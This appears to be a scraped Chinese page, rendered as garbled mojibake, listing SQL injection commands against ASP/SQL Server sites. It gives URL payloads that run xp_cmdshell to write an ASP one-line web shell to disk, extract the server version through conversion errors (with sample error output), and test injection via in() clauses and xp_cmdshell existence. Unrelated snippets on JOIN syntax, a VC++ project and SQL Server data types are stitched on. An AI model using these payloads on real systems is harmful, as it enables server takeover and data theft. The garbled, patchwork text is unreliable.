×îÏêϸµÄSQL×¢ÈëÓï¾ä
×îÏêϸµÄSQL×¢ÈëÓï¾äÏà¹ØµÄÃüÁîÕûÀí
1¡¢ ÓÃ^תÒå×Ö·ûÀ´Ð´ASP(Ò»¾ä»°Ä¾Âí)ÎļþµÄ·½·¨:
http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
2¡¢ ÏÔʾSQLϵͳ°æ±¾£º
http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--
Microsoft VBScript ±àÒëÆ÷´íÎó ´íÎó '800a03f6'
ȱÉÙ 'End'
/iisHelp/common/500-100.asp£¬ÐÐ242
Microsoft OLE DB Provider for ODBC Drivers ´íÎó '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.asp£¬ÐÐ17
3¡¢ ÔÚ¼ì²âË÷ÄáÖйúµÄÍøÕ¾Â©¶´Ê±£¬·ÖÃ÷ÒѾȷ¶¨ÁË©¶´´æÔÚÈ´ÎÞ·¨ÔÚÕâÈýÖÖ©¶´ÖÐÕÒµ½¶ÔÓ¦µÄÀàÐÍ¡£Å¼È»¼äÎÒÏëµ½ÁËÔÚSQLÓïÑÔÖпÉÒÔʹÓÓin”¹Ø¼ü×Ö½øÐвéѯ£¬ÀýÈç“select * from mytable where id in(1)”£¬À¨ºÅÖеÄÖµ¾ÍÊÇÎÒÃÇÌá½»µÄÊý¾Ý£¬ËüµÄ½á¹ûÓëʹÓÓselect * from mytable where id=1”µÄ²éѯ½á¹ûÍêÈ«Ïàͬ¡£ËùÒÔ·ÃÎÊÒ³ÃæµÄʱºòÔÚURLºóÃæ¼ÓÉÏ“) and 1=1 and 1 in(1”ºóÔÀ´µÄSQLÓï¾ä¾Í±ä³ÉÁË“select * from mytable where id in(1) and 1=1 and 1 in(1)”£¬ÕâÑù¾Í»á³öÏÖÆÚ´ýÒѾõÄÒ³ÃæÁË¡£ÔÝÇҾͽÐÕâÖÖÀàÐ͵Ä©¶´Îª“°üº¬Êý×ÖÐÍ”°É£¬´ÏÃ÷µÄÄãÒ»¶¨Ïëµ½ÁË»¹ÓГ°üº¬×Ö·ûÐÍ”ÄØ¡£¶ÔÁË£¬Ëü¾ÍÊÇÓÉÓÚÀàËÆ“select * from mytable where name in(‘firstsee’)”µÄ²éѯÓï¾äÔì³ÉµÄ¡£
4¡¢ ÅжÏxp_cmdshellÀ©Õ¹´æ´¢¹ý³ÌÊÇ·ñ´æÔÚ£º
http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) from master.dbo.sysobjects WHERE xtyp
Ïà¹ØÎĵµ£º
ϵͳ»·¾³£ºWindows 7
Èí¼þ»·¾³£ºVisual C++ 2008 SP1 +SQL Server 2005
±¾´ÎÄ¿µÄ£º±àдһ¸öº½¿Õ¹ÜÀíϵͳ
ÕâÊÇÊý¾Ý¿â¿Î³ÌÉè¼ÆµÄ³É¹û£¬ËäÈ»³É¼¨²»¼Ñ£¬µ«ÊÇ×÷ΪÎÒÓÃVC++ ÒÔÀ´±àдµÄ×î´ó³ÌÐò»¹ÊÇ´«µ½ÍøÉÏ£¬ÒÔ¹©²Î¿¼¡£ÓÃVC++ ×öÊý¾Ý¿âÉè¼Æ²¢²»ÈÝÒ×£¬µ«Ò²²»ÊDz»¿ÉÄÜ¡£ÒÔÏÂÊÇÎҵijÌÐò½çÃæ£¬ºóÃæ ......
SQL INNER JOIN ¹Ø¼ü×Ö
SQL INNER JOIN ¹Ø¼ü×Ö
ÔÚ±íÖдæÔÚÖÁÉÙÒ»¸öÆ¥Åäʱ£¬INNER JOIN ¹Ø¼ü×Ö·µ»ØÐС£
INNER JOIN ¹Ø¼ü×ÖÓï·¨
SELECT column_name(s)
from table_name1
INNER JOIN table_name2
ON table_name1.column_name=table_name2.column_name
×¢ÊÍ£ºINNER JOIN Óë JOIN ÊÇÏàͬµÄ¡£
ÔʼµÄ±í (ÓÃÔÚÀ ......
SQL JOIN
SQL join ÓÃÓÚ¸ù¾ÝÁ½¸ö»ò¶à¸ö±íÖеÄÁÐÖ®¼äµÄ¹ØÏµ£¬´ÓÕâЩ±íÖвéѯÊý¾Ý¡£
Join ºÍ Key
ÓÐʱΪÁ˵õ½ÍêÕûµÄ½á¹û£¬ÎÒÃÇÐèÒª´ÓÁ½¸ö»ò¸ü¶àµÄ±íÖлñÈ¡½á¹û¡£ÎÒÃǾÍÐèÒªÖ´ÐÐ join¡£
Êý¾Ý¿âÖеıí¿Éͨ¹ý¼ü½«±Ë´ËÁªÏµÆðÀ´¡£Ö÷¼ü£¨Primary Key£©ÊÇÒ»¸öÁУ¬ÔÚÕâ¸öÁÐÖеÄÿһÐеÄÖµ¶¼ÊÇΨһµÄ¡£ÔÚ±íÖУ¬Ã¿¸öÖ÷¼üµÄ ......
×î½üÔÚ×ömysqlµÄÐÔÄÜÓÇ»¯£¬×öµ½¶à±íÁ¬½Ó²éѯ£¬±È½ÏÍ·ÌÛ£¬¿´ÁËһЩjoinµÄ×ÊÁÏ£¬ÖÕÓڸ㶨£¬ÕâÀï·ÖÏí³öÀ´£¡
ÍâÁª½Ó¡£ÍâÁª½Ó¿ÉÒÔÊÇ×óÏòÍâÁª½Ó¡¢ÓÒÏòÍâÁª½Ó»òÍêÕûÍⲿÁª½Ó¡£
ÔÚ from ×Ó¾äÖÐÖ¸¶¨ÍâÁª½Óʱ£¬¿ÉÒÔÓÉÏÂÁм¸×鹨¼ü×ÖÖеÄÒ»×éÖ¸¶¨£º
&n ......
Êý¾ÝÀàÐÍ
´æ´¢³ß´ç
ÃèÊö
bigint
8 bytes
¡¡
integer
4 bytes
¡¡
smallint
2 bytes
¡¡
tinyint
1 byte
¡¡
bit
1 byte
¡¡
numeric(p,s)
decimal(p,s)
dec(p,s)
19 bytes
¡¡
money
8 bytes
¡¡
float
8 bytes
¡¡
real
4 bytes
¡¡
datetime
8 bytes
¡¡
nvarchar(n)
2*³¤¶È bytes
¡¡
nte ......